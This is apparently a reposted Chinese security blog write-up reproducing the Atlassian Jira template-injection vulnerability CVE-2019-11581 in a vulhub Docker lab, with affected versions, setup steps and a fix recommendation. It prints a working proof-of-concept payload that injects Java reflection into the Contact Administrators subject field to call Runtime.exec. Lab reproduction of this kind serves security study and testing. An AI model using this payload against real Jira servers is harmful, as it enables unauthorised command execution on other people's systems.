漏洞描述
Atlassian Jira是企业广泛使用的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。多个版本前存在利用模板注入执行任意命令:
影响范围
4.4.x
5.x.x
6.x.x
7.0.x
7.1.x
7.2.x
7.3.x
7.4.x
7.5.x
7.6.x before 7.6.14 (the fixed version for 7.6.x)
7.7.x
7.8.x
7.9.x
7.10.x
7.11.x
7.12.x
7.13.x before 7.13.5 (the fixed version for 7.13.x)
8.0.x before 8.0.3 (the fixed version for 8.0.x)
8.1.x before 8.1.2 (the fixed version for 8.1.x)
8.2.x before 8.2.3 (the fixed version for 8.2.x)
环境搭建
这里使用docker进行安装
进入目录
cd vulhub/jira/CVE-2019-11581/
启动环境
docker-compose up -d
访问
http://your-ip:8080
选择将其设置为我
去Atlassian官方申请一个Jira Server的测试证书
漏洞复现
登录成功后访问,添加
http://192.168.204.131:8080/secure/admin/AddSmtpMailServer!default.jspa
访问,进行系统设置
http://192.168.204.131:8080/secure/admin/EditApplicationProperties!default.jspa
开启联系管理员表单
然后随便创建一个项目
创建成功后,访问
http://192.168.204.131:8080/secure/ContactAdministrators!default.jspa
漏洞爆发点在主题字段,把主题换上我们的payload,点击发送
Poc
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('touch /tmp/cve-2020-11581').toString()
修复建议
升级到安全版本
本文始发于微信公众号(锋刃科技):Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论